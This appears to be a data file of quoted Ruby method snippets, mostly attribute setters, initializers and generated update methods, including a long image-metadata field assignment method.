"def create_attrib_item_values \n @base_attribs = []\n @attribs = params[:attrib]\n @attribs.keys.each do | key |\n @base_attribs << AttribItemValue.new(attrib_id: key, value: @attribs[key])\n #puts \"AttribItemValue: #{@base_attribs.last.attrib.id}, #{@base_attribs.last.value}\"\n end if @attribs\n #puts \"Attribs: #{@attribs}, @base_attribs: #{@base_attribs.size}\"\n modified_item_parms = item_params\n modified_item_parms[:attrib_values] = @base_attribs\n modified_item_parms\n end",
"def update_attributes(attrs)\n super({})\n end",
"def attributes=(_arg0); end",
"def rewrite_param_values(array_params); end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @cumulative_confidence = args[:cumulative_confidence] if args.key?(:cumulative_confidence)\n @experimental_confidence = args[:experimental_confidence] if args.key?(:experimental_confidence)\n end",
"def new_attributes(args)\n stats = default_attributes\n update_stats(stats, args)\n end",
"def new_attributes\n (audited_changes || {}).inject({}.with_indifferent_access) do |attrs, (attr, values)|\n attrs[attr] = values.is_a?(Array) ? values.last : values\n attrs\n end\n end",
"def add_attrs! attrs\n raise \"InvalidAttributesFormat\" unless attrs.is_a?(Hash)\n self.attributes.merge!attrs\n end",
"def add_attributes(attributes = [])\n attributes.each{ |attribute| attribute.is_a?(Array) ? add_attribute(attribute[0], attribute[1], attribute[2]) : add_attribute(attribute)}\n end",
"def setDirectConfAttr(attr)\n if(attr.is_a?(Array)) then\n return attr.map{|at| \n setDirectConfAttr(at) ;\n }\n else\n return self.instance_variable_set(\"@#{attr}\", self.getConf(attr)) ;\n end\n end",
"def add_doc_specific_attributes(filepath, is_src, attributes); end",
"def additional_attributes=(input)\n @additional_attributes = Array(input).map do |attribute_name|\n ADDITIONAL_ATTRIBUTE_MAP.fetch(attribute_name)\n end\n end",
"def attribute(*args)\n @attributes = attributes\n @attributes += args\n @attributes.uniq!\n end",
"def attributes= new_attributes\n ingest_attributes(new_attributes)\n end",
"def attr_setter(*attrs)\n code, made = '', []\n attrs.each do |a|\n code << \"def #{a}(*a); a.size > 0 ? (@#{a}=a[0]; self) : @#{a} end\\n\"\n made << a.to_sym\n end\n module_eval(code)\n made\n end",
"def check_attr(array, version_value, csv_value)\n array.push(version_value == csv_value)\n\tend",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @type = args[:type] if args.key?(:type)\n end",
"def assign_attributes( args = {} )\n args.each do |attr, value|\n send(\"#{attr}=\", value)\n end unless args.blank?\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @delta_nsr = args[:delta_nsr] if args.key?(:delta_nsr)\n @page_weight = args[:page_weight] if args.key?(:page_weight)\n @type = args[:type] if args.key?(:type)\n end",
"def update_attributes(attr = {})\n attr.each_pair do |k, v|\n if v.is_a?(Array) || v.is_a?(Hash)\n send(\"#{k}=\", v.dup)\n else\n send(\"#{k}=\", v)\n end\n end\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n end",
"def existing_organizer_attributes=(organizer_attributes)\n organizer_attributes.each do |attributes|\n proceed_contribution_attribute(attributes[1][:name], 'organizer')\n end\n end",
"def update!(**args)\n @asr_confidence = args[:asr_confidence] if args.key?(:asr_confidence)\n @is_sentence_start = args[:is_sentence_start] if args.key?(:is_sentence_start)\n @label_begin_char_index = args[:label_begin_char_index] if args.key?(:label_begin_char_index)\n @label_end_char_index = args[:label_end_char_index] if args.key?(:label_end_char_index)\n @time_ms = args[:time_ms] if args.key?(:time_ms)\n end",
"def attribute *array\n return self if guard *array\n r = self.clone\n a = array.flatten\n n_full_pairs, n_unpaired = a.length.divmod 2\n (1..n_full_pairs + n_unpaired).each do |i|\n r << '[' + a.shift\n r << '=' + a.shift unless i > n_full_pairs\n r << ']'\n end\n CssString.new r\n end",
"def apify(array)\n Rails.logger.info(array.class.name)\n if $valid_classes.include?(array.class.name)\n newArr = []\n array.each do |a|\n na = a.attributes\n if a.user\n na[\"user\"] = a.user\n end\n na[\"created_at\"] = \"#{time_ago_in_words(a.created_at)} ago\"\n if a.class.name == \"Question\"\n ur = a.get_user_unread(current_user)\n na[:unread] = ur[:unread]\n na[:unread_status] = ur[:status]\n na[:total_replies] = a.replies.size\n end\n newArr.push(na)\n end\n return newArr\n elsif array.class.name == \"Question\"\n a = array.attributes\n a[:user] = array.user\n a[:total_replies] = array.replies.size\n a[:replies] = apify(array.replies)\n a[:created_at] = \"#{time_ago_in_words(array.created_at)} ago\"\n return a\n end \n end",
"def initialize_attributes(attributes); end",
"def attr_csv(*attributes)\n define_attribute_methods rescue nil\n super\n attributes.reject { | attr | attr.is_a?(Hash) }.each { | attr | alias_method \"#{attr}_before_type_cast\", attr }\n\n # Register before_validate to update the csv fields\n before_validation :update_csved_attributes\n end",
"def adjustments=(args)\n @adjustments = *args\n end",
"def adjustments=(args)\n @adjustments = *args\n end",
"def initialize(input_arr=[])\n @internal_arr = []\n \n # take the input_arr and pass each value to add \n input_arr.each{|new_ele| add(new_ele)}\n\n end",
"def on_sentiment(attr)\n @attributes << attr\n end",
"def update!(**args)\n @bias = args[:bias] if args.key?(:bias)\n @confidence = args[:confidence] if args.key?(:confidence)\n @half_salience = args[:half_salience] if args.key?(:half_salience)\n @noise_correction = args[:noise_correction] if args.key?(:noise_correction)\n @observed_confidence = args[:observed_confidence] if args.key?(:observed_confidence)\n @observed_volume = args[:observed_volume] if args.key?(:observed_volume)\n @raw_volume = args[:raw_volume] if args.key?(:raw_volume)\n @source = args[:source] if args.key?(:source)\n @volume = args[:volume] if args.key?(:volume)\n end",
"def add_attribute_conversion( oid, conversion=nil )\n\t\tconversion = Proc.new if block_given?\n\t\t@attribute_conversions[ oid ] = conversion\n\tend",
"def set_weights(weights)\r\n # Current index of 'weights'\r\n index = -1\r\n # There might be a better way to do this...\r\n @layers.each do |layer|\r\n layer = layer.map {index += 1; weights[index]} \r\n end\r\n # Update attributes.\r\n weights\r\n # Return self to facilitate method chaining.\r\n self\r\n end",
"def []=( attrname, value )\n\t\tattrtype = self.find_attribute_type( attrname.to_sym ) or\n\t\t\traise ArgumentError, \"unknown attribute %p\" % [ attrname ]\n\t\tvalue = Array( value ) unless attrtype.single?\n\n\t\tself.mark_dirty\n\t\tif value.nil?\n\t\t\t@values.delete( attrtype.name.to_sym )\n\t\telse\n\t\t\t@values[ attrtype.name.to_sym ] = value\n\t\tend\n\n\t\t# If the objectClasses change, we (may) need to re-apply mixins\n\t\tif attrname.to_s.downcase == 'objectclass'\n\t\t\tself.log.debug \" objectClass change -- reapplying mixins\"\n\t\t\tself.apply_applicable_mixins( self.dn )\n\t\telse\n\t\t\tself.log.debug \" no objectClass changes -- no need to reapply mixins\"\n\t\tend\n\n\t\treturn value\n\tend",
"def create_sample_controlled_vocab_terms_attributes(array)\n attributes = []\n array.each do |type|\n attributes << { label: type }\n end\n attributes\nend",
"def apply\n scalar_attrs.each { |m| applicator(m) { |r| send(m, r) } }\n list_attrs.each { |m| applicator(m) { |r| send(m, *r) } }\n hash_attrs.each { |m| applicator(m) { |r| send(m).merge!(r) } }\n path_attrs.each { |m| applicator(m) { |r| send(\"#{m}=\", r) } }\n end",
"def xmlAttr()\r\n a = super()\r\n a << ['width', @width]\r\n a << ['height', @height]\r\n a << ['depth', @depth]\r\n @fillColor.xmlAttr.each { |ac|\r\n a << ac\r\n }\r\n a\r\n end",
"def extra_attributes_attributes=(attributes)\n map = Hash[extra_attributes.map { |k| [k.spec_id, k] }]\n method = attributes.respond_to?(:each_value) ? :each_value : :each\n attributes.send(method) do |attribute|\n if attribute['spec_id'] && map[attribute['spec_id'].to_i]\n map[attribute['spec_id'].to_i].value = attribute['value']\n end\n end\n end",
"def update!(**args)\n @char_offset = args[:char_offset] if args.key?(:char_offset)\n @confidence = args[:confidence] if args.key?(:confidence)\n @time_offset = args[:time_offset] if args.key?(:time_offset)\n end",
"def update!(**args)\n @confidence_metrics = args[:confidence_metrics] if args.key?(:confidence_metrics)\n @iou_threshold = args[:iou_threshold] if args.key?(:iou_threshold)\n @mean_bounding_box_iou = args[:mean_bounding_box_iou] if args.key?(:mean_bounding_box_iou)\n @mean_mismatch_rate = args[:mean_mismatch_rate] if args.key?(:mean_mismatch_rate)\n @mean_tracking_average_precision = args[:mean_tracking_average_precision] if args.key?(:mean_tracking_average_precision)\n end",
"def assign_attributes(attrs)\n attrs.each_pair do |k, v|\n self.send(\"#{k}=\", v)\n end\n end",
"def float_attrs\n []\n end",
"def add(arr)\n init_member(arr.count) if @sample_count == 0\n update_mean_and_r([arr])\n end",
"def initialize(*attrs, &block)\n @array = []\n @shared = false\n attrs.each do |a|\n case a\n when Array, AttrArray\n a.each do |aa|\n self << aa\n end\n when Hash\n attrs[0].each do |k, v|\n self << Attr.new(k, v)\n end\n else\n self << a\n end\n end\n\n if block_given?\n @body = yield \n else\n @body = Null\n end\n end",
"def build_simple_attributes(document)\n simple_attributes.each do |a|\n document.send(\"#{a}=\", geo_concern.send(a.to_s))\n end\n end",
"def numeric_attrs\n int_attrs + float_attrs\n end",
"def adjust_for_attributes(clazz)\n # BaptismalCertificate includes updating includes 3 attributes from CandidateSheet\n # this handles those attributes.\n if clazz == BaptismalCertificate\n bc = @candidate.baptismal_certificate\n if (bc.show_empty_radio == 1 || bc.show_empty_radio == 2) && !bc.baptized_at_home_parish?\n candidate_info_sheet_event = @candidate.get_candidate_event(CandidateSheet.event_key)\n candidate_info_sheet_event.mark_completed(@candidate.validate_event_complete(CandidateSheet),\n CandidateSheet)\n @candidate.keep_bc_errors\n candidate_info_sheet_event.save\n # TODO: what happens here of if save fails\n end\n end\n # SponsorEligibility includes updating includes 1 attributes from SponsorCovenant\n # this handles that attribute.\n return unless clazz == SponsorEligibility\n\n candidate_info_covenant_event = @candidate.get_candidate_event(SponsorCovenant.event_key)\n candidate_info_covenant_event.mark_completed(@candidate.validate_event_complete(SponsorCovenant),\n clazz)\n @candidate.keep_sponsor_name_error\n candidate_info_covenant_event.save\n # TODO: what happens here of if save fails\n end",
"def convert_adjust_params(params)\n params['on'] = params['on'] == 'true' if params['on']\n params['bri'] = params['bri'].to_i if params['bri']\n params['ct'] = params['ct'].to_i if params['ct']\n params['sat'] = params['sat'].to_i if params['sat']\n params['hue'] = params['hue'].to_i if params['hue']\n end",
"def initialize(input_arr=[])\n @internal_arr = []\n input_arr.each {|ele| add ele}\n\n # Fill in the rest of the initialize method here.\n \n # What should you do with each element of the incoming array?\n end",
"def initialize(attrs)\n @attributes = IdiomaticRubyWrapper(attrs.clone)\n end",
"def initialize(attrs)\n @attributes = IdiomaticRubyWrapper(attrs.clone)\n end",
"def fill_arr_withmodel(arr_ids, add_fn_target, model_classname, sort_on_weight = false)\n #p 'fill_arr_withmodel'\n #p arr_ids\n if arr_ids\n tmp = model_classname.find(arr_ids)\n if tmp\n tmp.sort!{|a,b| (b.get_always_weight <=> a.get_always_weight)} if sort_on_weight\n tmp.each do |item|\n send add_fn_target, item\n end\n end\n end\n end",
"def band_photos_attributes=(attrs = [])\n end",
"def attributes(*args)\n args.each do |attr|\n attribute(attr)\n end\n end",
"def attributes(new_attrs)\n @new_attrs = new_attrs.symbolize_keys\n attrs = original_attributes.merge(@new_attrs.merge({\n is_current_version: true,\n id: @record.id,\n version: @record.version + 1\n }))\n end",
"def update!(**args)\n @confidence = args[:confidence] if args.key?(:confidence)\n @item = args[:item] if args.key?(:item)\n @total = args[:total] if args.key?(:total)\n end",
"def initialize(input_arr=[])\n @internal_arr = []\n input_arr.each{|new_ele| add new_ele} # PLEASE EXPLAIN IN SECTION\n # Fill in the rest of the initialize method here.\n # What should you do with each element of the incoming array?\n end",
"def mutliplied(array)\nend",
"def update!(**args)\n @deprecated_blendingtype = args[:deprecated_blendingtype] if args.key?(:deprecated_blendingtype)\n @deprecated_gpstimestamp = args[:deprecated_gpstimestamp] if args.key?(:deprecated_gpstimestamp)\n @deprecated_iscolor = args[:deprecated_iscolor] if args.key?(:deprecated_iscolor)\n @deprecated_largestvalidinteriorrectheight = args[:deprecated_largestvalidinteriorrectheight] if args.key?(:deprecated_largestvalidinteriorrectheight)\n @deprecated_largestvalidinteriorrectleft = args[:deprecated_largestvalidinteriorrectleft] if args.key?(:deprecated_largestvalidinteriorrectleft)\n @deprecated_largestvalidinteriorrecttop = args[:deprecated_largestvalidinteriorrecttop] if args.key?(:deprecated_largestvalidinteriorrecttop)\n @deprecated_largestvalidinteriorrectwidth = args[:deprecated_largestvalidinteriorrectwidth] if args.key?(:deprecated_largestvalidinteriorrectwidth)\n @deprecated_process = args[:deprecated_process] if args.key?(:deprecated_process)\n @actionadvised = args[:actionadvised] if args.key?(:actionadvised)\n @addlmodelinfo = args[:addlmodelinfo] if args.key?(:addlmodelinfo)\n @advisory = args[:advisory] if args.key?(:advisory)\n @altitude = args[:altitude] if args.key?(:altitude)\n @animation_metadata = args[:animation_metadata] if args.key?(:animation_metadata)\n @aperturefnumber = args[:aperturefnumber] if args.key?(:aperturefnumber)\n @aperturevalue = args[:aperturevalue] if args.key?(:aperturevalue)\n @artworkorobject = args[:artworkorobject] if args.key?(:artworkorobject)\n @audioduration = args[:audioduration] if args.key?(:audioduration)\n @audiooutcue = args[:audiooutcue] if args.key?(:audiooutcue)\n @audiosamplingrate = args[:audiosamplingrate] if args.key?(:audiosamplingrate)\n @audiosamplingresolution = args[:audiosamplingresolution] if args.key?(:audiosamplingresolution)\n @audiotype = args[:audiotype] if args.key?(:audiotype)\n @author = args[:author] if args.key?(:author)\n @authorposition = args[:authorposition] if args.key?(:authorposition)\n @autoenhance = args[:autoenhance] if args.key?(:autoenhance)\n @baseurl = args[:baseurl] if args.key?(:baseurl)\n @bit_depth = args[:bit_depth] if args.key?(:bit_depth)\n @bitspersample = args[:bitspersample] if args.key?(:bitspersample)\n @brightnessvalue = args[:brightnessvalue] if args.key?(:brightnessvalue)\n @burstuuid = args[:burstuuid] if args.key?(:burstuuid)\n @cameraid = args[:cameraid] if args.key?(:cameraid)\n @cameramake = args[:cameramake] if args.key?(:cameramake)\n @cameramodel = args[:cameramodel] if args.key?(:cameramodel)\n @caption = args[:caption] if args.key?(:caption)\n @captionwriter = args[:captionwriter] if args.key?(:captionwriter)\n @capturesoftware = args[:capturesoftware] if args.key?(:capturesoftware)\n @category = args[:category] if args.key?(:category)\n @ccdwidth = args[:ccdwidth] if args.key?(:ccdwidth)\n @celllength = args[:celllength] if args.key?(:celllength)\n @cellwidth = args[:cellwidth] if args.key?(:cellwidth)\n @certificate = args[:certificate] if args.key?(:certificate)\n @chromasubsampling = args[:chromasubsampling] if args.key?(:chromasubsampling)\n @ciadrcity = args[:ciadrcity] if args.key?(:ciadrcity)\n @ciadrctry = args[:ciadrctry] if args.key?(:ciadrctry)\n @ciadrextadr = args[:ciadrextadr] if args.key?(:ciadrextadr)\n @ciadrpcode = args[:ciadrpcode] if args.key?(:ciadrpcode)\n @ciadrregion = args[:ciadrregion] if args.key?(:ciadrregion)\n @ciemailwork = args[:ciemailwork] if args.key?(:ciemailwork)\n @citelwork = args[:citelwork] if args.key?(:citelwork)\n 
@city = args[:city] if args.key?(:city)\n @ciurlwork = args[:ciurlwork] if args.key?(:ciurlwork)\n @colormap = args[:colormap] if args.key?(:colormap)\n @colorprofile = args[:colorprofile] if args.key?(:colorprofile)\n @colorspace = args[:colorspace] if args.key?(:colorspace)\n @compressedbitsperpixel = args[:compressedbitsperpixel] if args.key?(:compressedbitsperpixel)\n @compressionlevel = args[:compressionlevel] if args.key?(:compressionlevel)\n @contact = args[:contact] if args.key?(:contact)\n @contentlocationcode = args[:contentlocationcode] if args.key?(:contentlocationcode)\n @contentlocationname = args[:contentlocationname] if args.key?(:contentlocationname)\n @contrast = args[:contrast] if args.key?(:contrast)\n @contributor = args[:contributor] if args.key?(:contributor)\n @copyrightnotice = args[:copyrightnotice] if args.key?(:copyrightnotice)\n @country = args[:country] if args.key?(:country)\n @countrycode = args[:countrycode] if args.key?(:countrycode)\n @coverage = args[:coverage] if args.key?(:coverage)\n @createdate = args[:createdate] if args.key?(:createdate)\n @credits = args[:credits] if args.key?(:credits)\n @croppedareaimageheightpixels = args[:croppedareaimageheightpixels] if args.key?(:croppedareaimageheightpixels)\n @croppedareaimagewidthpixels = args[:croppedareaimagewidthpixels] if args.key?(:croppedareaimagewidthpixels)\n @croppedarealeftpixels = args[:croppedarealeftpixels] if args.key?(:croppedarealeftpixels)\n @croppedareatoppixels = args[:croppedareatoppixels] if args.key?(:croppedareatoppixels)\n @customrendered = args[:customrendered] if args.key?(:customrendered)\n @cvterm = args[:cvterm] if args.key?(:cvterm)\n @date = args[:date] if args.key?(:date)\n @datecreated = args[:datecreated] if args.key?(:datecreated)\n @datesent = args[:datesent] if args.key?(:datesent)\n @datetime = args[:datetime] if args.key?(:datetime)\n @datetimedigitized = args[:datetimedigitized] if args.key?(:datetimedigitized)\n @daylightsavings = args[:daylightsavings] if args.key?(:daylightsavings)\n @destination = args[:destination] if args.key?(:destination)\n @destination_latitude = args[:destination_latitude] if args.key?(:destination_latitude)\n @destination_longitude = args[:destination_longitude] if args.key?(:destination_longitude)\n @digimageguid = args[:digimageguid] if args.key?(:digimageguid)\n @digitalsourcefiletype = args[:digitalsourcefiletype] if args.key?(:digitalsourcefiletype)\n @digitalsourcetype = args[:digitalsourcetype] if args.key?(:digitalsourcetype)\n @digitalzoomratio = args[:digitalzoomratio] if args.key?(:digitalzoomratio)\n @distance = args[:distance] if args.key?(:distance)\n @dynamic_depth_metadata = args[:dynamic_depth_metadata] if args.key?(:dynamic_depth_metadata)\n @editorialupdate = args[:editorialupdate] if args.key?(:editorialupdate)\n @editstatus = args[:editstatus] if args.key?(:editstatus)\n @envelopenumber = args[:envelopenumber] if args.key?(:envelopenumber)\n @envelopepriority = args[:envelopepriority] if args.key?(:envelopepriority)\n @event = args[:event] if args.key?(:event)\n @exif4c = args[:exif4c] if args.key?(:exif4c)\n @exif_time = args[:exif_time] if args.key?(:exif_time)\n @exif_time_utc = args[:exif_time_utc] if args.key?(:exif_time_utc)\n @exif_time_utc_source = args[:exif_time_utc_source] if args.key?(:exif_time_utc_source)\n @expirationdate = args[:expirationdate] if args.key?(:expirationdate)\n @expirationtime = args[:expirationtime] if args.key?(:expirationtime)\n @exposurebias = args[:exposurebias] if 
args.key?(:exposurebias)\n @exposureindex = args[:exposureindex] if args.key?(:exposureindex)\n @exposurelockused = args[:exposurelockused] if args.key?(:exposurelockused)\n @exposuremode = args[:exposuremode] if args.key?(:exposuremode)\n @exposureprogram = args[:exposureprogram] if args.key?(:exposureprogram)\n @exposuretime = args[:exposuretime] if args.key?(:exposuretime)\n @extrasamples = args[:extrasamples] if args.key?(:extrasamples)\n @fillorder = args[:fillorder] if args.key?(:fillorder)\n @firmware = args[:firmware] if args.key?(:firmware)\n @firstphotodate = args[:firstphotodate] if args.key?(:firstphotodate)\n @fixtureidentifier = args[:fixtureidentifier] if args.key?(:fixtureidentifier)\n @flashcompensation = args[:flashcompensation] if args.key?(:flashcompensation)\n @flashenergy = args[:flashenergy] if args.key?(:flashenergy)\n @flashreturn = args[:flashreturn] if args.key?(:flashreturn)\n @flashused = args[:flashused] if args.key?(:flashused)\n @focallength = args[:focallength] if args.key?(:focallength)\n @focallengthin35mmfilm = args[:focallengthin35mmfilm] if args.key?(:focallengthin35mmfilm)\n @focalplaneunits = args[:focalplaneunits] if args.key?(:focalplaneunits)\n @focalplanexres = args[:focalplanexres] if args.key?(:focalplanexres)\n @format = args[:format] if args.key?(:format)\n @freebytecounts = args[:freebytecounts] if args.key?(:freebytecounts)\n @freeoffsets = args[:freeoffsets] if args.key?(:freeoffsets)\n @fullpanoheightpixels = args[:fullpanoheightpixels] if args.key?(:fullpanoheightpixels)\n @fullpanowidthpixels = args[:fullpanowidthpixels] if args.key?(:fullpanowidthpixels)\n @function = args[:function] if args.key?(:function)\n @gaincontrol = args[:gaincontrol] if args.key?(:gaincontrol)\n @gaudiomime = args[:gaudiomime] if args.key?(:gaudiomime)\n @gcameraburstid = args[:gcameraburstid] if args.key?(:gcameraburstid)\n @gcameraburstprimary = args[:gcameraburstprimary] if args.key?(:gcameraburstprimary)\n @gcameradisableautocreation = args[:gcameradisableautocreation] if args.key?(:gcameradisableautocreation)\n @gcameramicrovideo = args[:gcameramicrovideo] if args.key?(:gcameramicrovideo)\n @gcameramicrovideooffset = args[:gcameramicrovideooffset] if args.key?(:gcameramicrovideooffset)\n @gcameramicrovideopresentationtimestampus = args[:gcameramicrovideopresentationtimestampus] if args.key?(:gcameramicrovideopresentationtimestampus)\n @gcameramicrovideoversion = args[:gcameramicrovideoversion] if args.key?(:gcameramicrovideoversion)\n @gcameramotionphoto = args[:gcameramotionphoto] if args.key?(:gcameramotionphoto)\n @gcameramotionphotopresentationtimestampus = args[:gcameramotionphotopresentationtimestampus] if args.key?(:gcameramotionphotopresentationtimestampus)\n @gcameramotionphotoversion = args[:gcameramotionphotoversion] if args.key?(:gcameramotionphotoversion)\n @gcameraspecialtypeid = args[:gcameraspecialtypeid] if args.key?(:gcameraspecialtypeid)\n @gcreationscameraburstid = args[:gcreationscameraburstid] if args.key?(:gcreationscameraburstid)\n @gcreationstype = args[:gcreationstype] if args.key?(:gcreationstype)\n @gdepth_metadata = args[:gdepth_metadata] if args.key?(:gdepth_metadata)\n @gimagemime = args[:gimagemime] if args.key?(:gimagemime)\n @gpsdatestamp = args[:gpsdatestamp] if args.key?(:gpsdatestamp)\n @gpsdestbearing = args[:gpsdestbearing] if args.key?(:gpsdestbearing)\n @gpsdestbearingref = args[:gpsdestbearingref] if args.key?(:gpsdestbearingref)\n @gpsdestdistance = args[:gpsdestdistance] if args.key?(:gpsdestdistance)\n 
@gpsdestdistanceref = args[:gpsdestdistanceref] if args.key?(:gpsdestdistanceref)\n @gpsdestlatitude = args[:gpsdestlatitude] if args.key?(:gpsdestlatitude)\n @gpsdestlatituderef = args[:gpsdestlatituderef] if args.key?(:gpsdestlatituderef)\n @gpsdestlongitude = args[:gpsdestlongitude] if args.key?(:gpsdestlongitude)\n @gpsdestlongituderef = args[:gpsdestlongituderef] if args.key?(:gpsdestlongituderef)\n @gpsdifferential = args[:gpsdifferential] if args.key?(:gpsdifferential)\n @gpsdop = args[:gpsdop] if args.key?(:gpsdop)\n @gpsimgdirection = args[:gpsimgdirection] if args.key?(:gpsimgdirection)\n @gpsimgdirectionref = args[:gpsimgdirectionref] if args.key?(:gpsimgdirectionref)\n @gpsmapdatum = args[:gpsmapdatum] if args.key?(:gpsmapdatum)\n @gpsmeasuremode = args[:gpsmeasuremode] if args.key?(:gpsmeasuremode)\n @gpssatellites = args[:gpssatellites] if args.key?(:gpssatellites)\n @gpsspeed = args[:gpsspeed] if args.key?(:gpsspeed)\n @gpsspeedref = args[:gpsspeedref] if args.key?(:gpsspeedref)\n @gpsstatus = args[:gpsstatus] if args.key?(:gpsstatus)\n @gpstime = args[:gpstime] if args.key?(:gpstime)\n @gpstrack = args[:gpstrack] if args.key?(:gpstrack)\n @gpstrackref = args[:gpstrackref] if args.key?(:gpstrackref)\n @grayresponsecurve = args[:grayresponsecurve] if args.key?(:grayresponsecurve)\n @grayresponseunit = args[:grayresponseunit] if args.key?(:grayresponseunit)\n @has_alpha = args[:has_alpha] if args.key?(:has_alpha)\n @hdr_metadata = args[:hdr_metadata] if args.key?(:hdr_metadata)\n @headline = args[:headline] if args.key?(:headline)\n @height = args[:height] if args.key?(:height)\n @hostcomputer = args[:hostcomputer] if args.key?(:hostcomputer)\n @identifier = args[:identifier] if args.key?(:identifier)\n @imagenumber = args[:imagenumber] if args.key?(:imagenumber)\n @imageorientation = args[:imageorientation] if args.key?(:imageorientation)\n @imagetype = args[:imagetype] if args.key?(:imagetype)\n @initialhorizontalfovdegrees = args[:initialhorizontalfovdegrees] if args.key?(:initialhorizontalfovdegrees)\n @initialverticalfovdegrees = args[:initialverticalfovdegrees] if args.key?(:initialverticalfovdegrees)\n @initialviewheadingdegrees = args[:initialviewheadingdegrees] if args.key?(:initialviewheadingdegrees)\n @initialviewpitchdegrees = args[:initialviewpitchdegrees] if args.key?(:initialviewpitchdegrees)\n @initialviewrolldegrees = args[:initialviewrolldegrees] if args.key?(:initialviewrolldegrees)\n @instructions = args[:instructions] if args.key?(:instructions)\n @intellectualgenre = args[:intellectualgenre] if args.key?(:intellectualgenre)\n @interoperabilityindex = args[:interoperabilityindex] if args.key?(:interoperabilityindex)\n @iptc4c = args[:iptc4c] if args.key?(:iptc4c)\n @iptclastedited = args[:iptclastedited] if args.key?(:iptclastedited)\n @ismpformat = args[:ismpformat] if args.key?(:ismpformat)\n @isoequivalent = args[:isoequivalent] if args.key?(:isoequivalent)\n @keyword = args[:keyword] if args.key?(:keyword)\n @label = args[:label] if args.key?(:label)\n @language = args[:language] if args.key?(:language)\n @languageidentifier = args[:languageidentifier] if args.key?(:languageidentifier)\n @lastphotodate = args[:lastphotodate] if args.key?(:lastphotodate)\n @latitude = args[:latitude] if args.key?(:latitude)\n @lens = args[:lens] if args.key?(:lens)\n @lensid = args[:lensid] if args.key?(:lensid)\n @lensinfo = args[:lensinfo] if args.key?(:lensinfo)\n @lightsource = args[:lightsource] if args.key?(:lightsource)\n @location = args[:location] if 
args.key?(:location)\n @locationshown = args[:locationshown] if args.key?(:locationshown)\n @longitude = args[:longitude] if args.key?(:longitude)\n @marked = args[:marked] if args.key?(:marked)\n @maxaperturevalue = args[:maxaperturevalue] if args.key?(:maxaperturevalue)\n @maxavailheight = args[:maxavailheight] if args.key?(:maxavailheight)\n @maxavailwidth = args[:maxavailwidth] if args.key?(:maxavailwidth)\n @maxsamplevalue = args[:maxsamplevalue] if args.key?(:maxsamplevalue)\n @metadatadate = args[:metadatadate] if args.key?(:metadatadate)\n @meteringmode = args[:meteringmode] if args.key?(:meteringmode)\n @microvideooriginaloffset = args[:microvideooriginaloffset] if args.key?(:microvideooriginaloffset)\n @mime_type = args[:mime_type] if args.key?(:mime_type)\n @minormodelagedisclosure = args[:minormodelagedisclosure] if args.key?(:minormodelagedisclosure)\n @minsamplevalue = args[:minsamplevalue] if args.key?(:minsamplevalue)\n @mode = args[:mode] if args.key?(:mode)\n @modelage = args[:modelage] if args.key?(:modelage)\n @modelreleaseid = args[:modelreleaseid] if args.key?(:modelreleaseid)\n @modelreleasestatus = args[:modelreleasestatus] if args.key?(:modelreleasestatus)\n @modifydate = args[:modifydate] if args.key?(:modifydate)\n @motionphotovideodataboxheader = args[:motionphotovideodataboxheader] if args.key?(:motionphotovideodataboxheader)\n @nickname = args[:nickname] if args.key?(:nickname)\n @objectattributereference = args[:objectattributereference] if args.key?(:objectattributereference)\n @objectcycle = args[:objectcycle] if args.key?(:objectcycle)\n @objecttypereference = args[:objecttypereference] if args.key?(:objecttypereference)\n @offsettime = args[:offsettime] if args.key?(:offsettime)\n @offsettimedigitized = args[:offsettimedigitized] if args.key?(:offsettimedigitized)\n @offsettimeoriginal = args[:offsettimeoriginal] if args.key?(:offsettimeoriginal)\n @organisationinimagecode = args[:organisationinimagecode] if args.key?(:organisationinimagecode)\n @organisationinimagename = args[:organisationinimagename] if args.key?(:organisationinimagename)\n @orientation = args[:orientation] if args.key?(:orientation)\n @originatingprogram = args[:originatingprogram] if args.key?(:originatingprogram)\n @owner = args[:owner] if args.key?(:owner)\n @ownername = args[:ownername] if args.key?(:ownername)\n @panorama_metadata = args[:panorama_metadata] if args.key?(:panorama_metadata)\n @personinimage = args[:personinimage] if args.key?(:personinimage)\n @photometricinterpretation = args[:photometricinterpretation] if args.key?(:photometricinterpretation)\n @planarconfiguration = args[:planarconfiguration] if args.key?(:planarconfiguration)\n @poseheadingdegrees = args[:poseheadingdegrees] if args.key?(:poseheadingdegrees)\n @posepitchdegrees = args[:posepitchdegrees] if args.key?(:posepitchdegrees)\n @poserolldegrees = args[:poserolldegrees] if args.key?(:poserolldegrees)\n @primarychromaticities = args[:primarychromaticities] if args.key?(:primarychromaticities)\n @productid = args[:productid] if args.key?(:productid)\n @programversion = args[:programversion] if args.key?(:programversion)\n @projectiontype = args[:projectiontype] if args.key?(:projectiontype)\n @propertyreleaseid = args[:propertyreleaseid] if args.key?(:propertyreleaseid)\n @propertyreleasestatus = args[:propertyreleasestatus] if args.key?(:propertyreleasestatus)\n @publisher = args[:publisher] if args.key?(:publisher)\n @rating = args[:rating] if args.key?(:rating)\n @redeyemode = args[:redeyemode] if 
args.key?(:redeyemode)\n @referenceblackwhite = args[:referenceblackwhite] if args.key?(:referenceblackwhite)\n @referencedate = args[:referencedate] if args.key?(:referencedate)\n @referencenumber = args[:referencenumber] if args.key?(:referencenumber)\n @referenceservice = args[:referenceservice] if args.key?(:referenceservice)\n @relatedimagefileformat = args[:relatedimagefileformat] if args.key?(:relatedimagefileformat)\n @relatedimageheight = args[:relatedimageheight] if args.key?(:relatedimageheight)\n @relatedimagewidth = args[:relatedimagewidth] if args.key?(:relatedimagewidth)\n @relatedsoundfile = args[:relatedsoundfile] if args.key?(:relatedsoundfile)\n @relation = args[:relation] if args.key?(:relation)\n @releasedate = args[:releasedate] if args.key?(:releasedate)\n @releasetime = args[:releasetime] if args.key?(:releasetime)\n @resolutionunit = args[:resolutionunit] if args.key?(:resolutionunit)\n @rotate = args[:rotate] if args.key?(:rotate)\n @rowsperstrip = args[:rowsperstrip] if args.key?(:rowsperstrip)\n @samplesperpixel = args[:samplesperpixel] if args.key?(:samplesperpixel)\n @saturation = args[:saturation] if args.key?(:saturation)\n @scene = args[:scene] if args.key?(:scene)\n @scenecapturetype = args[:scenecapturetype] if args.key?(:scenecapturetype)\n @sensingmethod = args[:sensingmethod] if args.key?(:sensingmethod)\n 